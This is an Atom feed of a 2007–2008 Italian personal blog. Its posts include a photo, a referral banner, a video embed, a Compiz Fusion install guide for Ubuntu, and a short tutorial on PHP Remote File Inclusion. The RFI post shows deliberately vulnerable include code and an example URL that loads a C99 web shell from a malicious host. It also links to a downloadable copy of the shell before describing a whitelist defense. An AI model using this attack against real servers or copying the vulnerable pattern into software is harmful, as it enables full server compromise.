<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1004936615838349885</id><updated>2011-11-27T15:43:45.726-08:00</updated><category term='Quanto sono figo ?'/><category term='Remote File Inclusion'/><category term='Installazzione Compiz Fusion'/><title type='text'>ReaLife</title><subtitle type='html'>&lt;a href="http://inspiremarrow.com/pages/index.php?refid=djkoock"&gt;&lt;img src="http://inspiremarrow.com/images/banner.gif" border="0" alt="InspireMarrow.com"&gt;&lt;/a&gt;</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1004936615838349885.post-1126780767800792740</id><published>2008-03-12T03:16:00.000-07:00</published><updated>2008-03-12T03:18:25.748-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Quanto sono figo ?'/><title type='text'>Stefano</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_ZV7tji5gepU/R9etxLC-P0I/AAAAAAAAACI/s4_eTGaLtyo/s1600-h/io.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_ZV7tji5gepU/R9etxLC-P0I/AAAAAAAAACI/s4_eTGaLtyo/s400/io.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5176797356976127810" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1004936615838349885-1126780767800792740?l=djkoock-realife.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/1126780767800792740/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1004936615838349885&amp;postID=1126780767800792740' title='0 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/1126780767800792740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/1126780767800792740'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/2008/03/stefano.html' title='Stefano'/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_ZV7tji5gepU/R9etxLC-P0I/AAAAAAAAACI/s4_eTGaLtyo/s72-c/io.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1004936615838349885.post-5168132637378195650</id><published>2007-12-21T19:29:00.000-08:00</published><updated>2007-12-21T19:30:25.535-08:00</updated><title type='text'>Basta un click</title><content type='html'>&lt;a href="http://inspiremarrow.com/pages/index.php?refid=djkoock"&gt;&lt;img src="http://inspiremarrow.com/images/banner.gif" border="0" alt="InspireMarrow.com"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1004936615838349885-5168132637378195650?l=djkoock-realife.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/5168132637378195650/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1004936615838349885&amp;postID=5168132637378195650' title='0 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/5168132637378195650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/5168132637378195650'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/2007/12/basta-un-click.html' title='Basta un click'/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1004936615838349885.post-4386070501401655315</id><published>2007-12-09T09:10:00.000-08:00</published><updated>2007-12-09T09:33:47.231-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote File Inclusion'/><title type='text'>Remote File Inclusion</title><content type='html'>L'RFI (&lt;i&gt;Remote File Inclusion&lt;/i&gt;) è una vulnerabilità in applicazioni web scritte in PHP o ASP dovuta al mancato controllo dei file inclusi nel codice e passati tramite richieste GET o POST.&lt;br /&gt;Quando il nome di una pagina da includere è passato via GET o POST e non si effettuano controlli si può includere nel codice una pagina arbitraria. Spesso si includono shell scritte generalmente in PHP che forniscono un'ampia gamma di comandi, come la C99, che consente di modificare, rimuovere, creare file sulla cartella del server, fare copie delle tabelle del database, inviare comandi al server ecc., compromettendo in modo decisamente serio la sicurezza del sistema.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Supponiamo di avere un codice del genere:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="source-php"&gt;&lt;span class="kw2"&gt;&lt;br /&gt;&lt;span class="re0"&gt;$page&lt;/span&gt;=&lt;span class="re0"&gt;$_GET&lt;/span&gt;&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="st0"&gt;"page"&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt;;&lt;br /&gt;&lt;span class="kw1"&gt;include&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="re0"&gt;$page&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;span class="kw2"&gt;?&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Questo codice prende una pagina come variabile GET e la include all'interno dell'attuale pagina web. Questo codice è decisamente pericoloso per la sicurezza del sistema. Supponiamo che questa pagina sia accessibile a www.miosito.it/vuln.php . A questo punto posso passare come parametro alla mia applicazione una pagina sul server perfettamente lecita, e l'applicazione la includerà al suo interno (es. www.miosito.it/vuln.php?page=index.php ). Ma posso anche includere una shell C99 e il sistema non mi dirà niente ( www.miosito.it/vuln.php?&lt;a href="http://sito_malizioso/c99.txt" class="external free" title="http://sito_malizioso/c99.txt" rel="nofollow"&gt;http://sito_malizioso/c99.txt&lt;/a&gt; ). L'applicazione aprirà la pagina contenente il codice della C99 in formato txt, prenderà il codice e lo includerà all'interno della pagina che sta creando, consentendo quindi a un eventuale attaccante di avere le piene mani sull'amministrazione del server web.&lt;br /&gt;Una C99 in formato txt la potete trovare &lt;a href="http://blacklight.gotdns.org/c99.txt"&gt;qui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Come difendersi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In genere quando voglio includere una pagina esterna in una mia applicazione web voglio includere solo un insieme molto ristretto e numerato di possibili pagine, non tutte le pagine web di questo mondo. Ad esempio, se voglio creare un menu non voglio includere tutte le pagine possibili e immaginabili nella mia variabile GET, ma solo un range ristretto di pagine (per l'appunto quelle che voglio rendere accessibili dal mio menu). Basta quindi fare uno switch-case sui possibili valori della mia variabile GET, e a seconda del valore includere la pagina desiderata, senza lasciare completamente libero arbitrio all'utente. Basta questa accortezza per evitare ogni tipo di vulnerabilità di RFI.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1004936615838349885-4386070501401655315?l=djkoock-realife.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/4386070501401655315/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1004936615838349885&amp;postID=4386070501401655315' title='2 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/4386070501401655315'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/4386070501401655315'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/2007/12/remote-file-inclusion.html' title='Remote File Inclusion'/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1004936615838349885.post-8144805049458931272</id><published>2007-11-26T12:10:00.001-08:00</published><updated>2007-11-26T12:10:50.800-08:00</updated><title type='text'></title><content type='html'>&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_ImW0-MgR8I&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/_ImW0-MgR8I&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1004936615838349885-8144805049458931272?l=djkoock-realife.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/8144805049458931272/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1004936615838349885&amp;postID=8144805049458931272' title='0 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/8144805049458931272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/8144805049458931272'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/2007/11/blog-post.html' title=''/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1004936615838349885.post-9121146890473502099</id><published>2007-11-26T12:01:00.000-08:00</published><updated>2007-11-26T12:19:27.366-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Installazzione Compiz Fusion'/><title type='text'>Installazzione Compiz Fusion con driver ATI</title><content type='html'>Iniziamo con lo scaricare da questo link :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.blogger.com/%20http://kanotix.com/files/install-fglrx-debian.sh"&gt;http://kanotix.com/files/install-fglrx-debian.sh&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;lo script per i driver ATI.&lt;br /&gt;&lt;br /&gt;Poi successivamente bisogna eseguire lo script dalla console percui torniamo sul nostro bel terminale dando Ctrl+Alt+F1 e rilogghiamoci con i nostri dati&lt;br /&gt;&lt;br /&gt;Ora spostiamoci nella dir nella quale avete salvato lo script e diamo sudo sh install-fglrx-debian.sh . Aspettiamo che lo script scarichi i driver per la nostra scheda e che riavvi il sistema.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Aggiungiamo i repository&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Diamo da terminale sudo gedit /etc/apt/sources.list&lt;br /&gt;&lt;br /&gt;Poi incollate in fondo al file le seguenti righe e salvate :&lt;br /&gt;&lt;br /&gt;deb http://download.tuxfamily.org/3v1deb feisty eyecandy&lt;br /&gt;&lt;br /&gt;deb-src http://download.tuxfamily.org/3v1deb feisty eyecandy&lt;br /&gt;&lt;br /&gt;Ctrl+o  invio cosi salviamo e Ctrl +x usciamo dalla sources.list ;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Ora autentichiamo il repository&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Recuperando la chiave GPG :&lt;br /&gt;wget &lt;a href="http://download.tuxfamily.org/3v1deb/DD800CD9.gpg"&gt;http://download.tuxfamily.org/3v1deb/DD800CD9.gpg&lt;/a&gt; -O- | sudo apt-key add -   ;&lt;br /&gt;&lt;br /&gt;Perfetto  !!&lt;br /&gt;&lt;br /&gt;Ora aggiorniamo la nostra sources.list dando da terminale sudo apt-get update&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Rimuoviamo il vecchio compiz&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; Ora dobbiamo rimuovere il compiz già presente di default in Ubuntu e tutte le sue rimanenti configurazioni. Diamo in sequenza :&lt;br /&gt;&lt;br /&gt;sudo apt-get remove compiz-core desktop-effects&lt;br /&gt;&lt;br /&gt;rm -rf ~/.compiz&lt;br /&gt;&lt;br /&gt;gconftool-2  –shutdown&lt;br /&gt;&lt;br /&gt;gconftool-2 –recursive-unset /apps/compiz&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Installiamo Compiz core&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;Ora installiamo Compiz Core,Diamo un :&lt;br /&gt;&lt;br /&gt;sudo apt-get install compiz-gnome compizconfig-settings-manager libcompizconfig-backend-gconf&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Installiamo Compiz Fusion&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Ora non ci resta che installare il set di plugin aggiuntivi e fantascientifici, per gli amici Compiz Fusion :&lt;br /&gt;&lt;br /&gt;sudo apt-get install compiz-fusion-*&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Avviamo Compiz Fusion&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; compiz --replace -v &amp;amp;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;E il gioco è fatto. Per configurarlo, sotto&lt;br /&gt;Sistema -&gt; Preferenze dovreste trovare il “CompizConfig Settings Manager”, mentre per fare in modo che Compiz si avvii in automatico vi basta andare in:&lt;br /&gt;&lt;br /&gt;Sistema -&gt; Preferenze -&gt; Sessioni e aggiungere il comando :&lt;br /&gt;&lt;br /&gt;compiz --replace &amp;amp;&lt;br /&gt;&lt;br /&gt;Spero di esservi stato d'aiuto . Baciatemi nudo&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1004936615838349885-9121146890473502099?l=djkoock-realife.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://djkoock-realife.blogspot.com/feeds/9121146890473502099/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1004936615838349885&amp;postID=9121146890473502099' title='0 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/9121146890473502099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1004936615838349885/posts/default/9121146890473502099'/><link rel='alternate' type='text/html' href='http://djkoock-realife.blogspot.com/2007/11/iniziamo-con-lo-scaricare-da-questo.html' title='Installazzione Compiz Fusion con driver ATI'/><author><name>djkoock</name><uri>http://www.blogger.com/profile/04008466679282772878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
